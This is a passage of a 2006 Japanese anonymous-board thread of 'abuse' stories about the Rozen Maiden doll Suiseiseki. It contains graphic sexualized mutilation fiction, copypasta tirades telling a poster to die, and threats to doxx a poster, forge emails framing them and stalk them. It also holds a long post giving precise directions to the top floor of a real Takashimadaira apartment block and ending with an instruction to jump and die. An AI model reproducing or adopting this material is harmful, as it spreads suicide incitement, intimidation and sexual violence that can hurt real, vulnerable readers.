翠星石の顔面を蹴っ飛ばしてやった。顔にヒビが入ったようだ。
「わかったです!もうやめるです!」
「うるせーな!二度と動かないようにしてやる。」
翠星石のおまんまんや腹、そして顔におもいっきり包丁を突き刺してやった。
「ギャアァァァァァァァ!!やめろです!痛いです!今止めれば許してやるですぅ!」
「お前のその『ですぅ』を聞くとイライラするんだよ!お前なんかブッ壊してやる!」

704 :破壊人 ◆5g5J3l35.. :2006/03/12(日) 02:24:45 ID:64qEowrm
翠星石のきれいな巻髪を引き抜く。
ビリビリビリビリビリビリビリ
「イヤアァァァァァァアァァァ!翠星石の大切な髪の毛があぁぁ!お前なんか絶対にゆるさないです!」
「ほぅ。お前はまだそんな毒舌を言えるのか。もっとお仕置きしないとダメみたいだな。」
ボキッ!バキッ!
「いやぁーーーー!これじゃあもう翠星石は歩けないです!うっ、うっ・・・」
両足を折ってやった痛みと激痛で翠星石は泣き出してしまった。
「ついでにオナニーもできないようにしてやるよ!」
バキッ!ボキッ!ゴトン!
「す、翠星石のおててがぁ〜!もうなにもできないですぅ!ひっく・・・ひっく・・・」
「人形には必要ないおまんまんも使用不能にしてやろう・・・」
俺はハンマーを持ってきて翠星石のおまんまんに振りかざした。
バキッ!バキッ!グシャーン!
「翠星石のおまんまんが潰れちゃったですぅ!ひっく・・・」
薔薇乙女の命であるおまんまんうぇお破壊されてしまった翠星石はかなりに精神的ダメージを受けたようだ。
「なんで翠星石がこんな目に遭わなきゃいけないのですか!翠星石はなにもしてないですぅ!ひっく・・・ひっく・・・」
その後、翠星石は一人さびしく泣き続けた。

つづく・・・

とりあえずここまで。拙文スマソ。

705 :名無しかわいいよ名無し:2006/03/12(日) 05:49:14 ID:EkTwLvvi
まぁ、内容的にだんだん18禁とかアングラ向けのが増えてきたわな…
キャラ板にしては行き過ぎな気はするぜ!

706 :名無しかわいいよ名無し:2006/03/12(日) 08:16:18 ID:P4lLo+yQ
草花に水やる翠星石
「すこやかに〜のびやかに〜緑の葉をひろげて大きく育てですよ、おまえたち♪」

「そこまでだっ!」
「な、なんだ貴様らですぅ!?」

「我々は麻薬取締捜査官だ!ここで大麻の不法栽培がされてると通報があった、これより強制捜査に入る!」

「いやぁ!何勝手に入ってくるですか!?
ああっ?!葉っぱをひっこ抜くなです!やめるです、この子たちに罪はねーのです!」
「これらは証拠物件として確保するのだ」
「うう…す、スィドリ〜ム!」
「抵抗するか!かまわん発砲しろ!」

警官隊に蜂の巣にされる翠星石。

707 :名無しかわいいよ名無し:2006/03/13(月) 00:44:50 ID:g9Clz0/J
いまさらこんなこと聞くのもなんだが
翠星石が好きだから虐待してんのか?


708 :名無しかわいいよ名無し:2006/03/13(月) 00:52:45 ID:J4Vr3xKR
ああ、等身大翠星石をわざわざ作成して叩き潰すくらい好きだぞ。

709 :破壊人 ◆5g5J3l35.. :2006/03/13(月) 01:09:24 ID:YfIzOn3Q
>>703-704はどう見ても失敗作なのでまた作り直します。

710 :名無しかわいいよ名無し:2006/03/13(月) 01:56:40 ID:trqZaN/Z
何云ってんだ、桃種の眼前でリアル翠ドルフィーをバラバラに破壊してやりたくなるほど
翠がキライだから虐待してんじゃねーか。本気でむかつく。あのしゃべり虫唾が走る。
サイテードール。真紅や銀と同列されるのもおこがましい。さっさとジャンクになれよ。

711 :名無しかわいいよ名無し:2006/03/13(月) 01:58:32 ID:TntJDiGH
俺は翠星石のことは別にどうでもいい
このスレは他のドールとかに脳内変換して読んでるから
それでなくても虐待スレ大好きだし

712 :名無しかわいいよ名無し:2006/03/13(月) 04:54:24 ID:YfIzOn3Q
      / .,※,...-―:.:.:.:.:.:.:.:.:.:.:.:.:::ー-.、  \
    /  /,.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.::.:.:.:.:.:\※ヽ
    \ /:.:.:.::/:.:.:.::.:.:.:.:.:.:!:.!:.:.:.:.:.\::.:.:.:..:ヽ ',
     /:.:.:.:.:.:/.:.:.:.:.:.:.:../.;イ.:ト、.:.:.:.:.:.:ヽ.:.:.:.:.:ヽ
    ,':.:.:.:.:.:.:!.:.:.:.:.:.:.,:イ:/ ;:/ ヽ.:..:.:.:.:.!:.:.:.:.:.:.'※.
    !:.:.:.:.:.:.:|.:.:.:.:/.// //   \:.:.:.:.|:.:.:.:..:.:i
     |:.!:.:.:.:.:.|;∠..−'" 〃゛` ―--\:.!:.:..:.:.::,' }
    !ハ:.:.:.:.:.!   _,,  /   、_    /:.:.:./:/∧
    i! \:.:.:\`=''"    `ー=''イ/:.ィ//:.:.
       }ヾ、_\   '      //´ /:.:.:.   これは酷い糞スレですぅ
       ト、※,.>-―…―--<7´※ /:.:.:.:.
       !:.r(´.._'' ¨´ ̄ ̄`¨r-┴ 、  /ユュ_:.:.
       /:.{ 〉ーュ__...::::::::::.r―_`ヽ〈 // {j:.:.
.     /:.:/{Y´,.-<:::::::::::::::`ー、` ノュ!_j⌒ーリ:.:.
     /:.:.:! >` ー'、..__>-、_.ノス  ,'  |:.:.
     /:.:.:.| {~`^ーセ┘!}{} !_x-イ } ,'  |:.
.   /:.:.::.,'  !    !  | }{} ! i!   ト、  |:.
.   /:.:..:./  !    ,' }{} ! |   | ヽ   !:.:.
  /:.:./   ト   イ }{} ∧   | 〉  ハ:.

713 :名無しかわいいよ名無し:2006/03/13(月) 10:57:24 ID:J4Vr3xKR
>>712翠星石飲尿療法中

714 :名無しかわいいよ名無し:2006/03/13(月) 11:51:24 ID:XXbpnKYz
翠星石の頭もぎたいなぁ
頭とれても喋れるんだろうか

715 :名無しかわいいよ名無し:2006/03/13(月) 13:29:17 ID:dVUPUsak
                   _ ......... __
               ,.ィ"/,. ィ'":.:.:.:\:.:`丶、
             / / ,:":.:.:.:.:.:.:.:.:.:.:.:ヽ:.:.:.:.:.\
            / ./ /:.:./:.:.:.:.:.:.:.|:.:ト;.:.:l:.:.:.:.:.ヽヽ
          /  / /:.:./:.:.:.:.:.:.:.:/:.:| ',:.:ト、:.:.!:.:.l:.',
         く   ,'  l:.:.:.:l:.:.:./:.:.://_/ .l:/ー-ヽ:.:| ',|
           ヽ、.」  l:.:.:.:.l:.:.l_:/フ ' /' 、,,,,,.ノ:./ ′
             /:.:.{  !:.:.:.:.Vr   ,,ィ ′  ///イ}
            /:.:.:.:{   ヘ:.:.:.:\=''"//   _   ハ!   おまんまん気持ちいいですぅ〜♪
           /:.:.:.:.:.{   ,イ_ヽT rr‐',  <ノ  , ' }    
          /:.:.:.:.:.:..{ r-,.‐-.、>、ヽヽヽ ..__/   } 
         /:.:.:.:.:.:.:.:{ </: : : : :ヽ} ヽ、  ,ヽ,‐;.:.::{

       翠星石は翠星石のおまんまん揉むですぅ〜♪
        あぁん・・・あぁん・・・気持ちいぃですぅ〜♪
         ヌルヌルした汁が出てきたですぅ〜 ♪

716 :名無しかわいいよ名無し:2006/03/13(月) 13:42:05 ID:QUtVLwtL
いや人形なんだから汁は出ないと思うけど

717 :名無しかわいいよ名無し:2006/03/13(月) 13:46:48 ID:dVUPUsak
         ___ #ミ
       く/',二二ヽ>#  ミ
       |l |ノノイハ))
       |l |リ゚ ヮ゚ノl|   ヾ ヽ ∵:ガスッ:,
       ノl_||  ]]つつ-++#####ヘ∵ グシャッv
       ≦ノ`ヽノヘ≧    ∵(λ;⌒ ヽ >>1-716
       ミく二二二〉ミ  __⊂   つつ

718 :名無しかわいいよ名無し:2006/03/13(月) 13:48:34 ID:WzS5TfXN
汗とか涙でてるからわからんぞ

719 :名無しかわいいよ名無し:2006/03/13(月) 16:09:14 ID:XoC1XHOG
                        新型の試し打ちは必要だよね
         | ̄\|`\                           //ミ /_,. -;=''" _,
         |   \..;´从V∧)                      // '-'"`" -‐ニ‐"___=__--_ __ _ __ ___ _____
        /     ヽW#´∀`)                      :/レ    ____-__-__-__=_--_-__=__=_=_=____=__--
      /    ∧/⌒ /                      .,/′ ミ   : =  _-            
     /  /| / /  / \                    ; i:::″  ;ミ  二 __=__--_ __ _ __ ____-__-__-__=
   / __/ /S\ \ ̄ ̄三三二二ニ≡≡≡==========lニlll)..!::^: >>717      三 _ __ _ __ ___ _       
  / / / 〉自由\__)_/っΕ)_/――――"           !::^:   ミ) ≡ _ __ _ __ _         
/ / ./.∠__/ .Θ/二二二二二二二ロ             i:: :: :  ミ    _-__-__-__=_--_-__=_=_=___
|_/  / ../ /二二二二二二二二二二ロ               ヽ  ヾ ) ) ヽ_ __ _ __ ___ _____-__-__-__=_--_-__
    |_/./ / /  /~\ \                        ヾ\\:  \,. -;=''" _,.-;-
.     / / /  /    >  )                          \ |\  :: |i''-'"`" -
      .|_./. / ノ   / /                            丶 :: ,. -;=''"
       ./ /   / ./
      / ./    ( ヽ、
      (..ノ      ヽ. ..)


720 :名無しかわいいよ名無し:2006/03/13(月) 18:43:40 ID:ErU0jqwR
というかさ、他のアニメキャラや東方や月姫とかでも
こういう虐待板はあるのかな?
なんとなくローゼンメイデンのSS少ないしさ
やっぱネタないからこういう虐待ネタに縋ってると思うのは気のせい?

721 :名無しかわいいよ名無し:2006/03/13(月) 18:54:23 ID:AatoSUU6
ローゼンの虐待総合スレってある?

722 :名無しかわいいよ名無し:2006/03/13(月) 22:45:53 ID:pF6kTQ+T
        〜∞
      /⌒⌒ ̄ ̄ ̄\ 〜∞
    /           \ 〜〜
    |     ____ノ ノノ.__| 〜〜
    |    /U  ._)  ._) 〜〜
    |   |           ( 〜〜
    ヽ_ノ(6   ∵ ( 。。) )
     \  U     ) 3 ノ.- 、
     r―_ヽ ,,_  U  _,,ノ  々i
     ! メ   ̄`. ´  ̄`    .ノ
     .'- .ィ   >>717    .「 , '
.        | :。::   メ :。:: ! i
       ノ #    メ   ヽ、
     , '    ヽζζζ , '   ヽ
     .{ _.ト、   Y|iY  # ,イ .}
     '、 >.ト    '|. '   イノ .ノ
      ' .,,_ ___ ノ-^-`、 ___.... - '
              、‖
         ●●● ブチュッ
     ●● ●● ● ●● ブリュブリュッ


723 :名無しかわいいよ名無し:2006/03/13(月) 23:34:49 ID:0vjmxF1Z
あれほど言ったのに、まだそんなカキコするですか!もう許さねーですぅ!
あんたを許すわけにはいかねーですぅ!こんなカキコでレスたくさん付くとでも
思ってるなんて頭おかしーよですぅ!あんたみたいなバカ初めて見たですぅ!
あんたみたいなバカ、ゴキブリ以下ですぅ!あんたみたいなバカ、ウジ虫以下ですぅ!
死にやがれですぅ!つーか、死ぬべきですぅ!あんたは絶対に許されねーです!
勘違いしたバカを許すわけにはいかねーですぅ!面白半分にいい加減なカキコ
するヤツなんか許さねーですぅ!キャラメルコーンのピーナッツをケツの穴に詰めて
死にやがれですぅ!!!
今まであんたがどんな生き方してきたか知らねーですけど、どーせひどい生き様
だったと想像出来るですぅ!あんたのカキコから読みとれるですぅ!バカ特有の
匂いがするですぅ!あんたのことが全く理解出来ねーですぅ!あんたは絶対許さねーですぅ!
死んでも許さねーですぅ!地獄で苦しみやがれですぅ!それでも足りねーくらいですぅ!
豆腐の角に頭ぶつけて死にやがれですぅ!!!
あんたもっと現実を知りやがれですぅ!いつまでも引きこもってネクラなことしてる
場合じゃねーよですぅ!でも、もー手遅れですぅ!あんたは何をやってもダメですぅ!
この世に生まれてきたことを後悔してもダメですぅ!あんたは生まれ変わっても
どうせダメ人間に決まってるですぅ!絞め殺したいけどあんたに触るのが嫌なので
やめるですぅ!でも、あんたみたいなカスは死にやがれですぅ!風呂の排水口に吸い込まれて
死にやがれですぅ!!!
絶対許さんです!絶対許さんです!絶対許さんです!あんたみたいなヤツは
絶対許さんです!早く消えろです!さっさとこの世からいなくなれよです!!!
いつまでも勘違いしたまま生きていけると思ったら大間違いだよです!この
まま生きててもお前にはいーことなんにもねーよです!何でもいいからさっさと
死ねよです!!!

724 :名無しかわいいよ名無し:2006/03/14(火) 00:17:19 ID:uQbVZm8z
あれほど言ったのに、まだそんな口答えするのか!もう許さねーぞ!
翠星石、お前を許すわけにはいかない!そんな口答えをして支援レスたくさん付くとでも
思ってるなんて頭おかしいんじゃねーか?翠星石にたいなバカ初めて見たぜ!
翠星石みたいなバカ、ザザ虫以下だぜ!翠星石みたいなバカ、ゾウリムシ以下だ!
死んじまえクソミドリ!つーか死ぬんだよクソミドリ!てめぇは絶対に許されねー!
勘違いしたクソ人形を許すわけにはいかない!面白半分にいい加減な口答えするクソ翠なんか許さない!
柿ピーのピーナッツをアナルに詰めて死にやがれ!
今まで貴様がどんな生き方してきたか知らないが、どーぜひどい生き様だったと想像できるよ!
クソミドリの口答えから読みとれるぜ!バカ特有の臭いがするぜ!てめぇのことなんざ理解できるわけねーだろクソミドリ!てめぇは絶対許さねぇ!
死んでも許さねぇ!つうか、地獄の底からはい上がって来てでも許さねぇ!それでも足りねぇくらいだ!
納豆の海に溺れて死にやがれ!
翠星石、現実を知るがいい!ほんとにヤバイ奴は俺のように社交的でネアカで『とてもそんなことをするような人には見えない』
って言われるような奴なんだよ!だから何をやろうと手遅れどころか何をやっても大丈夫なんだよ!
創造されたことを後悔しろクソミドリ!人形は生まれ変わることはできない、壊れたら唯のゴミだ!
粉々にしてやりたいが、俺の大事なハンマーにいらぬ傷がつくのでやめとくぜ!
きさまみたいなクソミドリは死にやがれ!便器の排水口につまって死にやがれ!
絶対許さん!絶対ゆるさん!絶対ゆるさんぞ!翠星石、お前は絶対ゆるさん!
早く消えろ!さっさとこの世から消滅しろ!!!
いつまでも勘違いしたまま存在していられると思ったら大間違いだ!このまま存在していても
クソ翠星石にはおめでたいことなんかありゃしねーぜ!何でもいいからとっとと
潰れろ!!!

725 :名無しかわいいよ名無し:2006/03/14(火) 00:52:29 ID:diRph1F/
>>724‖リ´q`ノ‖ハァハァ言葉責め・・・たまんねぇですぅ・・・もっと言ってほしいですぅ。

726 :名無しかわいいよ名無し:2006/03/14(火) 01:19:49 ID:cBTjp2qY
謝れとは言いわないですけどこっちもちょっと大人気ないですぅけど、
ムカついたからハッカーのマスターに頼んであんたの個人情報を
探させることにしたですぅ。あ、もう遅いですぅ。
もーとっくにマスター解析始めちまってるですぅから・・・
ちなみにこれは自慢じゃねーですけどそのマスターは日本でも
5の指に入るくらいの凄腕のハッカーなのですぅ。
この前マスターに頼んでやらせたらものの5分で他人の個人情報を
抜き取ってたですぅ。
マスターにとってそれくらい赤子の指をひねるくらいの行いなのですぅ!
これであんたもいっかんの終わりってやつですぅ!
まあせいぜい後悔するがいいですぅ。
それから、もう二度とこんな書き込みはしないことですぅ(私も私のマスターも私をいじめるやつが大嫌いですぅ。
またあんな書き込みを見つけたら即解析に入るように頼んでおいたですぅ。
それじゃぁ、二日後くらいですぅ?また例のところに来やがれですぅ。
あんたの住所本名住所その他もろもろのせておくですぅ(笑)
あ、警察とかに言ったって無駄ですぅ。
あんたはあんなレス(犯罪)したんですから通報したところで捕まるのは
アンタですぅ!!!!!!マスターは掲示板のログを自在に操ることができるですぅ。
と、いうことでbye♪(^O^)/~~ですぅ

727 :名無しかわいいよ名無し:2006/03/14(火) 01:43:29 ID:diRph1F/
      ___  
     く/',二二ヽ> 
     |l |ノノイハ)) 
      |l |;゚ ー゚ノl|虐待されないとギャラが貰えなくて生活苦しいですぅ 
     ノl_|(l_介」).|
    ≦ノ`ヽノヘ≧ 
.   ミく二二二〉ミ 




728 :名無しかわいいよ名無し:2006/03/14(火) 01:49:26 ID:uQbVZm8z
>>726の翠星石、残念だが俺は冷静だぜ?
なぜならクソ翠のハッカーのマスターなら さっき当局にしょっぴかれたぜ?
日本で5本の指に入る凄腕?相変わらずタワケな人形だぜ!
インターネットそのものが某帝国主義国家の技術を民間に貸してるモノなんだぜ?
当然社会に害をなすハッカーなんざハッカー本人の知らぬところで監視されてるんだぜ?
だが、よほどのことが無い限り当局ってのは動かない。
「翠星石とかいう漫画・アニメの『現実には実在しない物』が貶められたからといって動いたら、
 『税金のムダ』だから動かない」
が、
「現実に実在する他人の個人情報を抜き取るなんて『社会的問題』に対して動くのは『税金のムダ』
 どころか 『湯水のように税金を使うための立派な言い訳』だから、やつらは動くんだよ。
クソミドリのマスターはクソミドリのせいで、いっかんの終わりだぜ!
これでクソ翠を擁護する奴はいなくなった。せいぜい後悔しろよクソ翠星石w
いじめていじめていじめ抜いてやるぜ。
あ、弁護士とかに言ったって無駄無駄無駄ァッwww
クソ翠なんて架空のモノをいくら叩いたって犯罪にはならねーんだからよ、立件のしようがないぜ!
訴えたって法廷侮辱罪で逆に裁判所から訴えられるのはクソ翠擁護の>>726だぜwww
このログを証拠として出せば言い逃れはできねーぜ!
じゃあな、あばよ!


729 :名無しかわいいよ名無し:2006/03/14(火) 02:43:49 ID:cBTjp2qY
>>728
昨日あんたの父親、うちに謝りに来たですよ。
たぶんあんたなんかより万能ネギの方が役に立つですぅ。
あんたの物真似したらみんなから注意されたですぅ。なんでですぅかね?
あんたの住んでる場所、地図だと「荒れ地」になってたですよ。
あんたの上履き隠した犯人、女ですぅよ。
あんたの家族、みんな前歯が2、3本ねーですけど、なんかそういう主義なんですぅか?
あんたの父親の再就職先、私のマスターのとこに決まったですぅよ。
あんたの家、じじいの代から給食費払ってねーらしいですぅね?
あんたの家じゃ、一番甘い食べ物がトマトらしいですぅね。
あんたの事を歌った替え歌が小学生の間で流行ってるらしいですぅよ。
あんたの写ってやがるネガ、現像拒否されちまったですぅ。
人種のるつぼですぅね。あんたの家に来る借金取り。
あんたのひいじじい、味方の援護射撃で死んだって本当ですぅか?
あんたの家の水道水、ものすげーカラフルですぅ。
あんたなんか誘拐されてもどーせ「神隠し」かなんかでかたづけられちまうですぅ。
あんたの叔父へのガン告知、上司の尻文字だったって本当ですぅ?
さすが幼児期を残酷なグリム童話で育てられた奴は違うですぅ。
エボラ出血熱の感染源、あんたの母親のスパッツだそーですぅねぇ?
客に出すコップは、ワンカップ大関のシール剥がしてあるらしいですけどホントですぅかぁ?
あんたの家、甲子園球場なみにツタが巻きついてやがるですぅ。

最期にこれだけは言っておいてやるですぅ。
あんた人気あるですよ。臓器移植手術待ちの子供達に

730 :名無しかわいいよ名無し:2006/03/14(火) 03:27:10 ID:uQbVZm8z
>>729
クソ翠、お前に「うち」なんてねーだろ?鞄で暮らしてるんじゃなかったのか?
お前のアナルに入らなくていいならネギ以下でもかまわん!
俺の真似ができるわけねーからだろクソミドリwww
「荒れ地」として登録すれば所得税が安く済むからだ。ちなみに「宅地建物取引法」では売買時には「宅地」としてみなされるのでボロ儲けだぜww
あれは「放課後保健室でやろう」っていう合図なんだよww人形にはわからんだろうが。
抜歯といってな、高貴な生まれの習慣だ。ちなみにその習慣が江戸時代庶民に広まったのがお歯黒だw勉強になるだろクソ翠。
ああ、そうだ俺の親父はお前のマスターの国選弁護士に任命されたのさ。マスターによろしくなww
ああ、ひいじじいの代から多額の寄付金払ってるからな、給食費なんて雑費は免除されてるんだ。
金太郎ってトマトは糖度はクソ翠の好きな苺より高いんだぜ?
「らしい」じゃない「流行ってたんだ」人気者っていうかおだてりゃ、おごってもらえると思ってたらしいぜ?
ふん、人形が!デジカメ全盛でもうフィルム製造しないことになったのを知らないのか!
なんのかんの言って日本の国債は各国に信用あるからな。
ああ、味方をかばってな「杉野、杉野はいずこ〜♪」って軍歌にもなったんだぜ。
戦艦大和でも使われてた給水装置でね、当時の乗組員も成分を調整して大和ラムネやジュースなるものを作ったって話だぜww
ああ、実は昔本当に神隠しにあった。自分は丸一日失踪したと思っていたんだが現実では3秒しかたってなかったんだ。
叔父さんが言ってたっけ...その上司は以前鞄から出てきた緑色の人形にののしられて、おかしくなったって...
ドイツのグリム兄弟は残酷じゃないだろ、残酷なのはグリム兄弟が参考にしたフランスのペローの書いた奴の方だ。
ああ、タイシルクで織ったオートクチュールのな。
いや、実は奈良の正倉院から流出した古代ペルシアのグラスなんだ。学の無い奴はワンカップ大関のコップに見えるらしいがなw
その通り!元旧華族のお屋敷でな、ツタの絡みつく建物がなんとも言えぬ趣きをかもし出しているのだよ!

最期に言っておこう
臓器移植に使える臓器は歪みも無く健康な臓器だけだ。クソミドリのマスターの奇形臓器は廃棄物といっしょに産廃業者が回収されるのがオチww

731 :名無しかわいいよ名無し:2006/03/14(火) 04:00:15 ID:cBTjp2qY
キレたですぅ! >>730

あんた、真性厨房ですぅ。何も知らないバカですぅ!!
狩はですね、IPをしっかり記録しているんですぅ! そんなことは常識ですぅ! クズ人間!

私が「あるルート」からあんたのIPを入手したらどうすると思うですか。
メールを偽造してやるですぅ!
あたかもあんたがFROM欄を偽造して、私のマスター宛てに卑猥なメール、
それかウィルスを送信したけど、あんたのIPが記録されてたって感じのヤツをですぅ。
串刺してようが関係ねえですぅ。どこのサーバー管理者もISPもトラブルはゴメンですぅし、
匿名を笠に着て好き放題しやがるあんたみたいなガキが大嫌いときてるですぅ。
喜んでサーバーログを提供してくれるに決まってるですぅ!

さて、ですぅ。あんたの素性が判ったらどうするか?ですぅ。
プロバイダに連絡してアカウントを取り消してやる……なんて幼稚な事はしねえです。
あんたんちの周辺で張り込んでやるですぅ。そして貴様の醜い姿をデジカメで撮るですぅ!
それを適当な「無料ホームページ」にアップロードして、
あんたの大好きな 2ちゃんねるの各板に貼り付けてやるですぅ!
もちろん氏名、年齢、住所、電話番号なんかと一緒に、ですぅ。
そして知っての通り、2chにはごく僅かですけど本物の狂人がいるですぅ。
あんたみたいなやつですぅ!

今から作業を始めるですぅ。
簡単じゃねえですし、時間もかかるですぅ。私自身へのリスクもあるですぅ。
でも私は本気ですぅ!地の果てまでも足跡を辿り、
とことんあんたを追い詰めてやるですぅ!

あんたの末路をasahi.comの社会欄で読むのが、今の私の最大の望みですぅ。

732 :名無しかわいいよ名無し:2006/03/14(火) 05:43:39 ID:cBTjp2qY
 ところで、>>730。東京に行ったことはあるですか?摩天楼の並ぶ都心を歩くと、さすが日本の首都だと
思うですよ。東京の都心をぐるっと取り囲む、山手線っっていう鉄道があってですね。池袋とか新宿とか渋谷
とか、都心の繁華街を結んでいるんですけど、これがいつ乗っても込んでやがるんですぅ。よくみんなあんな
くそうっとおしーラッシュに耐えてるですぅ。感心するですぅ。そんでですぅね、山手線の内側には、都心全域に網の目のよ
ーに張り巡らされている地下鉄があるんですぅ。全部で12路線もあってですね。便利ですけど乗換えとかが結構
クソややこしいのですぅ。ところで、その地下鉄の中に、都営三田線っていうのがあるですぅ。正式名称を
東京6号線っていうのですぅけど、一昨年の秋、三田から目黒まで延長されて、東急目黒線と相互直通運転する
ようになったのですぅ。直通電車に乗れば神奈川県の武蔵小杉までいけるですぅ。将来的にはもっと先まで乗り
入れるらしいですぅよ。便利になるですぅ。
 さてですぅ、例えば東京駅からこの都営三田線に乗るとするですぅ。営団丸ノ内線で池袋方面に一駅の大手町で
乗り換えるのがわかりやすいですけど、大手町なんて大して遠くもねーですから一駅くらい歩いてもいいですぅ。
運賃ももったいねーですし。目黒方面に行きたいとき、運良く武蔵小杉行きが来ればいいんですぅけど、半分
は途中の白金高輪で折り返しちまって、それより先に行きたかったら隣のホームの営団南北線の電車に
乗り換えないといけねーですぅ。くそ面倒くさいですぅ。だからここでは逆方向の電車に乗ることにするですぅ。
 大手町の次は神保町ですぅ。書店街で有名ですぅね。都営新宿線と営団半蔵門線に乗り換えられるですぅ。
その次は水道橋ですぅ。中央線に乗り換えられるですぅ。次の春日はつい最近までなんでもないただの駅だったですぅけど、
一昨年の12月に都営大江戸線が開通したおかげで、後楽園の丸ノ内線と南北線に乗り換えられるようになったですぅ。
もちろん大江戸線にも乗り換えられるですぅ。春日の次は白山、千石と続いて、巣鴨に着くですぅ。ここからは山手
線の外側ですぅ。巣鴨の次、西巣鴨は都電荒川線の新庚申塚、その次の新板橋は埼京線の板橋や東武東上線
の下板橋にそれほど遠くねーですぅ。結構便利ですよ。まあ、JRも私鉄も、都心から延びる鉄道はほとんどみん
な放射線状になっているから、板橋区役所前、板橋本町、本蓮沼と進んでいくうちに他の鉄道からは離
れていくんですけど。志村坂上を過ぎるとすぐに地上に出て、志村三丁目からは終点まで高架橋ですぅ。
はっきりいって、これじゃあもうとっくの昔に地下鉄じゃねーくなってやがるですぅ。蓮根の次の西台の横には三田線の車庫があって、
こっから出てきた電車は次の高島平から発車するですぅ。終点の西高島平まではあと二駅ですぅけど、その一つ手前の
新高島平で降りておくです。
 新高島平の改札口を出てすぐ左に昇り階段があるですぅ。これを昇ると歩道橋に上がれるですぅ。
間違えて駅の外に出ちまっても、左の「高島平3・4丁目方向」に出てすぐ左にあるですから、そっちから行きゃいいですぅ。
歩道橋を渡って、左側に下りるですぅ。下りてから駅や道路から離れる向きに進むと、すぐ高い建物に突き当たる
と思うですぅ。そうしたら左へ進むですぅ。そのまましばらく行くと右側の建物が途切れて、次の建物が見えてくるですぅ。
たぶん壁には3-11-1っていう表示があるはずですぅ。その建物の、こっちから3分の1くらいのところにエレ
ベーターホールがあるですぅ。エレベーターは3台あるですけど、行ける階が違うですぅから、右の9号機じゃねーくて左の
7号機か真中の8号機に乗るですぅ。そのエレベーターでは8階から14階に行けるはずですぅ。とりあえず14階まで
上がるですぅ。ちょっとおせーエレベーターですけど我慢するですぅ。
 そして14階から廊下に出るんですけど、もし三田線の車窓からこの高島平団地をよく観察していたなら、
あることに気がつくはずですぅ。そう、この建物だけ、廊下の 外側に鉄格子がついてねーんですぅ。だから下界
の風景が何にも邪魔されないで、よく見えるですぅ。結構な眺めだからよく目に焼き付けておくといいですぅ。そう、
顔を出して、 体を十分に乗り出して、ですぅ。そしてそのまま飛び降りて氏ねですぅ。

733 :名無しかわいいよ名無し:2006/03/14(火) 06:21:29 ID:6GPnIeSN
>>723-732
なにこのイジメられっ子の走り書き

734 :名無しかわいいよ名無し:2006/03/14(火) 08:29:18 ID:qcyBbY9i
・・・・(苦笑)

735 :名無しかわいいよ名無し:2006/03/14(火) 09:16:53 ID:diRph1F/

      ___  
     く/',二二ヽ> 
     |l |ノノイハ)) 
      |l |リ゚ ー゚ノl| 本日の虐待は何ですぅか〜♪ 
     ノl_|(l_介」).|
    ≦ノ`ヽノヘ≧ 
.   ミく二二二〉ミ 




736 :名無しかわいいよ名無し:2006/03/14(火) 09:24:43 ID:iCt183sO
レイプショーだよ

737 :名無しかわいいよ名無し:2006/03/14(火) 09:28:59 ID:uQbVZm8z
うわぁ...もう付き合いきれん...暇つぶしに、てきとーにレスしたら、
もはや翠でもなんでもなくて電波になってるな...

あのな...え〜と哀れな翠人形?「IPを手に入れたら」とか「素性がわかったら」とか
『仮定形じゃ脅しにならない』の。少なくとも「IPはすでに手に入れた」「素性はわかった」じゃないとね。わかった?
って毒舌機能しかない人形相手になにやってんだ俺...

摩天楼は『エンパイアステートビル』のことだから東京じゃなくてニューヨークな?
あとその路線説明、何年前のデータだ?

あとな高島平の高層マンションな、あれ確か7億かけて鉄格子作ったり、落下防止ネットつけたり、構造上工事できないところは
警備員やとって巡回したり、セ〇ムの警備機器つけて不審者の進入を未然に防ごうとしてるの。
管理してるのも昔みたいに素人の集まりの管理組合じゃなくて大手マンション管理会社の管理に変わって、対策とってるから今、気軽に自殺することできんぞ。
だからうかつに最上階からクソ緑色の毒舌性悪人形を地上に叩きつけて粉々にすることすらできん。
あまりネットの情報、鵜呑みにせんようにな。
って、外に出るのも怖いクソミドリはマスターのパソでしか情報えられんからしょうがないか...


738 :名無しかわいいよ名無し:2006/03/14(火) 10:34:52 ID:uQbVZm8z
>>735
確定申告に行って帰ったら虐待するから待ってろ性悪人形!

739 :名無しかわいいよ名無し:2006/03/14(火) 11:10:16 ID:O0NaFQQ+
できれば無慈悲に残酷に

740 :名無しかわいいよ名無し:2006/03/14(火) 13:06:12 ID:aqmWWyG0

     く/',二二ヽ> サカサマニシテBAKAニシテヤルデス
     |l |ノノイハ))
      |l リ#゚听ノi| ∩_∩
     ノl_|(l_介」|]⊃  x }
    ≦ノ`ヽノヘ≧ |_つ _つ
.   ミく二二二〉ミ(⌒ ~⌒)>>1-739
            ゝ’-’r

741 :名無しかわいいよ名無し:2006/03/14(火) 14:47:36 ID:RKf/eUPm
ディードとかいう職人気取りの低学歴がウザイ。

742 :名無しかわいいよ名無し:2006/03/14(火) 15:22:36 ID:BQgDGpTU
ウザイなら見ない。誰も来てくれとか頼んでないしw

743 :名無しかわいいよ名無し:2006/03/14(火) 15:37:36 ID:RKf/eUPm


744 :名無しかわいいよ名無し:2006/03/14(火) 15:38:32 ID:iCt183sO
ディードって誰よ

745 :名無しかわいいよ名無し:2006/03/14(火) 16:32:45 ID:b2iMUuiF
              _ -- 、
     ス        入    _>
     タ        /:::/トイ::::|
    タ      /:::/:::|::::|:::::|
   タ     /:::/:::;イ:::::l:::::|
   タ    /:::/:/:.!::::::l:::::l
      _∠ニフ': : : :.',::::::l:::::l
   r┬':仁二): : : : : : :Y二二)
   └ハに二Y ー-: : :_:_:_`フイ
     `}\:.)ノ: : : : : : : : :└rう
     ⌒'7辷_┬┬┬イノ))
      / // / //⌒⌒´
    ' // / // /
    // / / '
.   /

746 :名無しかわいいよ名無し:2006/03/14(火) 16:33:22 ID:b2iMUuiF
              _ -- 、
     ス        入    _>
     タ        /:::/トイ::::|
    タ      /:::/:::|::::|:::::|
   タ     /:::/:::;イ:::::l:::::|
   タ    /:::/:/:.!::::::l:::::l   逃げるですぅ
      _∠ニフ': : : :.',::::::l:::::l
   r┬':仁二): : : : : : :Y二二)
   └ハに二Y ー-: : :_:_:_`フイ
     `}\:.)ノ: : : : : : : : :└rう
     ⌒'7辷_┬┬┬イノ))
      / // / //⌒⌒´
    ' // / // /
    // / / '
.   /  

747 :名無しかわいいよ名無し:2006/03/14(火) 16:33:54 ID:b2iMUuiF
              _ -- 、
     ス        入    _>
     タ        /:::/トイ::::|
    タ      /:::/:::|::::|:::::|
   タ     /:::/:::;イ:::::l:::::|
